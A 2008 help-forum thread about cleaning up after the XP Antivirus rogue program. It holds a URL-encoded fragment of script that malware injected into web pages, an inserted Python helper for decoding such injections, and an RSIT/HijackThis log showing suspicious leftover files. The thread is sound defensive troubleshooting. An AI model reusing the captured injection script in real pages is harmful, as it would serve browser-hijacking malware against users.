
xp antivirus ... i know i know!

Discussion in 'Malware and Virus Removal Archive' started by ynot2k, 2008/09/04.

  1. 2008/09/04
    ynot2k (Thread Starter)

    So I manually removed XP Antivirus from a machine on our network. I was able to remove it completely with the help of HJT. I ran Malwarebytes' Anti-Malware after removing it and it turned up nothing.

    However, at this point IE7 is pooched. It seems there is a rogue DLL or something in there that is injecting downloaded web pages with some script code that is making it very difficult to use IE, rendering some pages useless. For the time being, I have switched the user to FFX, but as requested I would love to restore IE7. I did do a reset in the Advanced tab of Internet Options, but that didn't help. I updated to SP3 but that didn't help either. At this point I am considering updating to IE8 beta (and possibly back down to IE7) to see if that fixes it.

    I've gone through the list of Add-Ons and nothing looks fishy to me. Moreover, I would love to go into Add/Remove Programs and uninstall IE7 & reinstall it, but that option is not there. As I am remote, I would also love to be able to fix this without going into the Recovery Console, as that would mean I would need to go on-site.

    Would downloading the IE7 distributable be a good idea?
    Any other suggestions? I am happy to post any current HJT logs and/or random logs... Below is a comparison of a very simple web page and how the script is being injected.

    Thanks in advance.
    ynot2k

    ===== SIMPLE WEBPAGE RETURNED NORMALLY FROM A VIEW SOURCE OF NON-INFECTED MACHINE:
    Code:
    <HTML><HEAD><TITLE>Your IP</TITLE></HEAD><BODY bgcolor=#ffffff>
    <FONT STYLE='font-family: arial; font-size: 10pt; font-weight: bold;'>Your IP address is: xxx.xxx.xxx.xxx<br />Current Time: Thursday, September 04, 2008 10:09:40 AM</FONT><P>
    </BODY></HTML>
    ===== SAME VIEW SOURCE FROM INFECTED MACHINE (line breaks included):
    Code:
    0D%0Adocument.addEventListener%28%22DOMContentLoaded%22%2Ci%2Cfalse%29%3B%20%7D%20else%20if%28e%29%7B%20%20%20%20%20%28%0D%0Afunction%28%29%7Bvar%20t%3Ddocument.createElement%28%27doc%3Ardy%27%29%3Btry%7Bt.doScroll%28%27left%27%29%3B%0D%0Ai%28%29%3Bt%3Dnull%3B%7Dcatch%28e%29%7Bst%28arguments.callee%2C0%29%3B%7D%7D%29%28%29%3B%7Delse%7Bwindow.onload%3Di%3B%7D%7D%29%28init_b216dvsa6v%29%3B'))</script> <HTML><HEAD><TITLE>Your IP</TITLE></HEAD><BODY bgcolor=#ffffff>
    <FONT STYLE='font-family: arial; font-size: 10pt; font-weight: bold;'>Your IP address is: 99.232.104.141<br />Current Time: Thursday, September 04, 2008 10:12:04 AM</FONT><P>
    </BODY></HTML
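As an added example (not code from the original thread), a small Python triage helper for the symptom described in the post: given the view-source a clean machine receives and the view-source the suspect machine receives for the same URL, it isolates whatever the suspect machine's browser stack injected, pulls the unescape('...') argument out of any injected script, and URL-decodes it so the script can be read. The encoded tail is the fragment quoted above as captured; the page bodies and the document.write(unescape(...)) wrapper around that tail are constructed samples.

```python
"""Triage helper: isolate and decode script injected into a downloaded page.

Added example, not the thread's own code.  PAGE_FRAGMENT is the encoded tail
quoted in the post; CLEAN_PAGE and INFECTED_PAGE are constructed samples.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# unescape('...') or unescape("...") with the quote matched by backreference
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.DOTALL)

# Encoded tail of the injected script, copied as captured in the post
# (the front of the script is missing from the capture).
PAGE_FRAGMENT = (
    "0D%0Adocument.addEventListener%28%22DOMContentLoaded%22%2Ci%2Cfalse%29%3B"
    "%20%7D%20else%20if%28e%29%7B%20%20%20%20%20%28%0D%0Afunction%28%29%7Bvar%20t"
    "%3Ddocument.createElement%28%27doc%3Ardy%27%29%3Btry%7Bt.doScroll%28%27left"
    "%27%29%3B%0D%0Ai%28%29%3Bt%3Dnull%3B%7Dcatch%28e%29%7Bst%28arguments.callee"
    "%2C0%29%3B%7D%7D%29%28%29%3B%7Delse%7Bwindow.onload%3Di%3B%7D%7D%29%28init_b216dvsa6v%29%3B"
)

# Constructed sample modelled on the clean view-source in the post.
CLEAN_PAGE = (
    "<HTML><HEAD><TITLE>Your IP</TITLE></HEAD><BODY bgcolor=#ffffff>\n"
    "<FONT>Your IP address is: xxx.xxx.xxx.xxx</FONT><P>\n</BODY></HTML>"
)
# Constructed: the captured tail wrapped in document.write(unescape('...'))
# and prepended to the server's HTML, the shape the infected capture shows.
INFECTED_PAGE = (
    "<script>document.write(unescape('" + PAGE_FRAGMENT + "'))</script> " + CLEAN_PAGE
)

# Strings whose presence in the delta is worth a responder's attention.
INDICATORS = ("document.write", "window.onload", "addEventListener",
              "createElement", "arguments.callee")


def decode_layers(encoded: str, max_layers: int = 5) -> str:
    """URL-decode repeatedly; nested unescape(unescape(...)) is common."""
    text = encoded
    for _ in range(max_layers):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def extract_delta(received: str, expected: str) -> Dict[str, object]:
    """Split what the suspect machine saw into prefix/suffix around the
    server's real page. intact=False means the real page was not found
    verbatim, so the whole received body is treated as suspect."""
    pos = received.find(expected)
    if pos < 0:
        return {"prefix": received, "suffix": "", "intact": False}
    return {"prefix": received[:pos],
            "suffix": received[pos + len(expected):],
            "intact": True}


def decoded_payloads(html_fragment: str) -> List[str]:
    """Every unescape('...') argument inside <script> blocks, decoded."""
    payloads: List[str] = []
    for script in SCRIPT_RE.findall(html_fragment):
        for _quote, enc in UNESCAPE_RE.findall(script):
            payloads.append(decode_layers(enc))
    return payloads


def triage(received: str, expected: str) -> Dict[str, object]:
    """Summarise the injection: size of the delta, decoded payloads and
    which indicator strings appear in the delta or its decoded payloads."""
    delta = extract_delta(received, expected)
    injected = str(delta["prefix"]) + str(delta["suffix"])
    payloads = decoded_payloads(injected)
    hits = sorted({ind for text in payloads + [injected]
                   for ind in INDICATORS if ind in text})
    return {"intact": delta["intact"], "injected_bytes": len(injected),
            "payloads": payloads, "indicators": hits}


if __name__ == "__main__":
    result = triage(INFECTED_PAGE, CLEAN_PAGE)
    print("injected bytes:", result["injected_bytes"])
    print("indicators:", result["indicators"])
    for payload in result["payloads"]:
        print("decoded payload:\n", payload)
```

Decoding the captured tail shows a DOM-ready shim (DOMContentLoaded listener, doScroll polling fallback, window.onload) that hands control to init_b216dvsa6v once the page has loaded.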
     
  2. 2008/09/07
    noahdfear

    Hi ynot2k,

    Let's see if anything turns up with another scanner.

    • Download RSIT by random/random and save it to your desktop.
    • Double click RSIT.exe to start the tool and click Continue at the disclaimer.
    • When the scan completes it will open a log named log.txt maximized, and a log named info.txt minimized.
    • Please post the contents of log.txt here in your next reply.
     

  4. 2008/09/08
    ynot2k (Thread Starter)

    Hi noahdfear:

    Thanks for your help. Below is the result of the RSIT run. Note that I have blocked out IP addresses and anything related to user and/or company details, but all it really does is affect the path names as far as I can tell.

    Thanks for any insight you can provide. Cheers, ynot2k

    ---

    Logfile of random's system information tool (written by random/random)
    Run by xxxxxx at 2008-09-08 16:49:08
    Microsoft Windows XP Professional Service Pack 3
    System drive C: has 33 GB (42%) free of 78 GB
    Total RAM: 1983 MB (63% free)

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 4:49:11 PM, on 08/09/2008
    Platform: Windows XP SP3 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16705)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Smith Micro\StuffIt11\ArcNameService.exe
    C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    C:\Program Files\Canon\CAL\CALMAIN.exe
    C:\WINDOWS\Explorer.EXE
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Common Files\Real\Update_OB\realsched.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\Program Files\Google\Google Talk\googletalk.exe
    C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
    C:\Program Files\Adobe\Adobe Photoshop CS3\Photoshop.exe
    C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    C:\Program Files\Adobe\Adobe Illustrator CS3\Support Files\Contents\Windows\Illustrator.exe
    C:\Program Files\Internet Explorer\IEXPLORE.EXE
    C:\WINDOWS\system32\notepad.exe
    C:\Program Files\Internet Explorer\Iexplore.exe
    D:\Installation Media\RSIT.exe
    C:\Program Files\Trend Micro\HijackThis\xxxxxx.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.[COMPANYDOMAIN].com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://[COMPANYDOMAIN].blogspot.com/2006/10/office-20-conference-san-francisco.html
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer provided by [COMPANYNAME]
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar4.dll
    O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll
    O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar4.dll
    O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut] HDAShCut.exe
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
    O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
    O4 - HKLM\..\Run: [Adobe_ID0EYTHM] C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
    O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
    O4 - HKLM\..\Run: [RoxWatchTray] "C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe"
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
    O4 - HKCU\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
    O4 - HKCU\..\Run: [googletalk] "C:\Program Files\Google\Google Talk\googletalk.exe" /autostart
    O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [ISUSPM] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O4 - Startup: Desktop Manager.lnk = C:\Program Files\Research In Motion\BlackBerry\DesktopMgr.exe
    O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O4 - Global Startup: QuickBooks Update Agent.lnk = C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
    O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O15 - Trusted Zone: *.[COMPANYDOMAIN]
    O16 - DPF: {48DD0448-9209-4F81-9F6D-D83562940134} (MySpace Uploader Control) - http://lads.myspace.com/upload/MySpaceUploader1006.cab
    O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/mic...ls/en/x86/client/muweb_site.cab?1191431904018
    O16 - DPF: {6F750203-1362-4815-A476-88533DE61D0C} (Kodak Gallery Easy Upload Manager Class) - http://www.kodakgallery.ca/downloads/BUM/BUM_WIN_IE_2/axofupld.cab
    O16 - DPF: {F137B9BA-89EA-4B04-9C67-2074A9DF61FD} (Photo Upload Plugin Class) - http://blacks.pnimedia.com/upload/activex/v2_0_0_10/PCAXSetupv2.0.0.10.cab?
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O17 - HKLM\Software\..\Telephony: DomainName = office.[COMPANYDOMAIN]
    O17 - HKLM\System\CCS\Services\Tcpip\..\{58A041D9-4CDA-4CB8-8254-D2BCA1054E2B}: NameServer = [name server ip addresses]
    O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O17 - HKLM\System\CS3\Services\Tcpip\Parameters: Domain = office.[COMPANYDOMAIN]
    O23 - Service: Adobe Version Cue CS3 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe
    O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
    O23 - Service: AVVBDB - Sysinternals - www.sysinternals.com - C:\DOCUME~1\[USER]~1.002\LOCALS~1\Temp\AVVBDB.exe
    O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
    O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
    O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: Roxio UPnP Renderer 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe
    O23 - Service: Roxio Upnp Server 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe
    O23 - Service: LiveShare P2P Server 9 (RoxLiveShare9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe
    O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
    O23 - Service: Roxio Hard Drive Watcher 9 (RoxWatch9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
    O23 - Service: SiSoftware Database Agent Service (SandraDataSrv) - SiSoftware - C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\Win32\RpcDataSrv.exe
    O23 - Service: SiSoftware Sandra Agent Service (SandraTheSrv) - SiSoftware - C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe
    O23 - Service: Stuffit Archive Name Service - Smith Micro Software, Inc. - C:\Program Files\Smith Micro\StuffIt11\ArcNameService.exe
    O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

    --
    End of file - 10292 bytes

    Scheduled tasks folder

    C:\WINDOWS\tasks\AppleSoftwareUpdate.job
    C:\WINDOWS\tasks\User_Feed_Synchronization-{CEEF0C1D-80B1-4558-8615-94BE1A901D7E}.job

    Registry dump

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
    AcroIEHlprObj Class - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll [2004-12-14 63136]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
    SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
    Google Toolbar Helper - c:\program files\google\googletoolbar4.dll [2007-01-20 2403392]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}]
    Google Toolbar Notifier BHO - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll [2008-04-07 734704]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    {2318C2B1-4965-11d4-9B18-009027A5CD4F} - &Google - c:\program files\google\googletoolbar4.dll [2007-01-20 2403392]

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    "High Definition Audio Property Page Shortcut"=C:\WINDOWS\system32\HDAShCut.exe [2005-01-07 61952]
    "RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2005-07-12 14679552]
    "Alcmtr"=C:\WINDOWS\ALCMTR.EXE [2005-05-03 69632]
    "TkBellExe"=C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2006-10-11 185784]
    "Adobe_ID0EYTHM"=C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE [2007-03-20 1884160]
    "ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe [2006-09-11 218032]
    "QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2007-06-29 286720]
    "iTunesHelper"=C:\Program Files\iTunes\iTunesHelper.exe [2007-09-26 267064]
    "NBKeyScan"=C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe []
    "SunJavaUpdateSched"=C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe [2008-06-10 144784]
    "RoxWatchTray"=C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe [2007-08-16 236016]
    "NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2005-12-10 7311360]
    "nwiz"=C:\WINDOWS\system32\nwiz.exe [2005-12-10 1519616]
    "NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2005-12-10 86016]

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2007-06-29 286720]
    "googletalk"=C:\Program Files\Google\Google Talk\googletalk.exe [2007-01-01 3739648]
    "swg"=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [2007-08-13 68856]
    "ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2008-04-13 15360]
    "ISUSPM"=C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [2006-09-11 218032]

    C:\Documents and Settings\All Users\Start Menu\Programs\Startup
    Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    QuickBooks Update Agent.lnk - C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe

    C:\Documents and Settings\[USER].[DOMAIN].002\Start Menu\Programs\Startup
    Desktop Manager.lnk - C:\Program Files\Research In Motion\BlackBerry\DesktopMgr.exe

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{1a3e09be-1e45-494b-9174-d7385b45bbf5}]

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "NoDispBackgroundPage"=1
    "NoDispScrSavPage"=1

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "dontdisplaylastusername"=0
    "legalnoticecaption"=
    "legalnoticetext"=
    "shutdownwithoutlogon"=0
    "undockwithoutlogon"=1

    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
    "%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
    "C:\Program Files\Google\Google Talk\googletalk.exe"="C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"
    "C:\Program Files\iTunes\iTunes.exe"="C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes"
    "C:\Documents and Settings\[user]\Desktop\Leechftp.exe"="C:\Documents and Settings\[user]\Desktop\Leechftp.exe:*:Enabled:LeechFTP"
    "C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe"="C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe:*:Enabled:SiSoftware Sandra Agent Service"
    "%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"

    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
    "C:\Program Files\RealVNC\VNC4\vncviewer.exe"="C:\Program Files\RealVNC\VNC4\vncviewer.exe:*:Enabled:Run VNC Viewer"
    "C:\Program Files\Google\Google Talk\googletalk.exe"="C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"
    "C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE"="C:\Program Files\Internet Explorer\IEXPLORE.EXE:*:Enabled:Internet Explorer"
    "C:\Documents and Settings\[USER].[DOMAIN].000\Desktop\Leechftp.exe"="C:\Documents and Settings\[USER].[DOMAIN].000\Desktop\Leechftp.exe:*:Enabled:LeechFTP"
    "%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
    "C:\WINDOWS\explorer.exe"="C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"
    "C:\Program Files\iTunes\iTunes.exe"="C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes"
    "C:\Program Files\Macromedia\Dreamweaver 8\Dreamweaver.exe"="C:\Program Files\Macromedia\Dreamweaver 8\Dreamweaver.exe:*:Enabled:Dreamweaver 8"
    "C:\WINDOWS\system32\sessmgr.exe"="C:\WINDOWS\system32\sessmgr.exe:*:Disabled:@xpsp2res.dll,-22019"
    "C:\Program Files\FTP Commander\ftpcomm.exe"="C:\Program Files\FTP Commander\ftpcomm.exe:*:Enabled:ftpcomm"
    "C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe"="C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe:*:Enabled:SiSoftware Sandra Agent Service"
    "C:\WINDOWS\system32\drivers\svchost.exe"="C:\WINDOWS\system32\drivers\svchost.exe:*:Disabled:svchost"
    "%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}]
    shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL virgin.html


    File associations

    .js - edit - "C:\Program Files\Macromedia\Dreamweaver 8\dreamweaver.exe" "%1"
    .js - open - "C:\Program Files\Adobe\Adobe Dreamweaver CS3\Dreamweaver.exe", "%1"

    List of files/folders created in the last three months

    2008-09-08 16:49:08 ----D---- C:\rsit
    2008-09-08 13:54:40 ----A---- C:\WINDOWS\system32\windows_update.exe
    2008-09-05 03:00:20 ----HDC---- C:\WINDOWS\$NtUninstallKB951978$
    2008-09-04 11:19:07 ----D---- C:\Documents and Settings\All Users\Application Data\nView_Profiles
    2008-09-03 16:30:41 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\Malwarebytes
    2008-09-03 16:30:37 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
    2008-09-03 16:30:37 ----D---- C:\Documents and Settings\All Users\Application Data\Malwarebytes
    2008-09-03 15:57:22 ----A---- C:\WINDOWS\system32\wmpns.dll
    2008-09-03 15:56:49 ----D---- C:\WINDOWS\Prefetch
    2008-09-03 15:53:19 ----HDC---- C:\WINDOWS\$NtUninstallKB952954$
    2008-09-03 15:53:14 ----HDC---- C:\WINDOWS\$NtUninstallKB952287$
    2008-09-03 15:53:08 ----HDC---- C:\WINDOWS\$NtUninstallKB951748$
    2008-09-03 15:53:04 ----HDC---- C:\WINDOWS\$NtUninstallKB951698$
    2008-09-03 15:52:59 ----HDC---- C:\WINDOWS\$NtUninstallKB951376-v2$
    2008-09-03 15:52:53 ----HDC---- C:\WINDOWS\$NtUninstallKB951066$
    2008-09-03 15:52:49 ----HDC---- C:\WINDOWS\$NtUninstallKB950974$
    2008-09-03 15:52:45 ----HDC---- C:\WINDOWS\$NtUninstallKB950762$
    2008-09-03 15:52:38 ----HDC---- C:\WINDOWS\$NtUninstallKB946648$
    2008-09-03 15:49:44 ----D---- C:\WINDOWS\system32\scripting
    2008-09-03 15:49:43 ----D---- C:\WINDOWS\system32\en
    2008-09-03 15:49:43 ----D---- C:\WINDOWS\system32\bits
    2008-09-03 15:49:43 ----D---- C:\WINDOWS\l2schemas
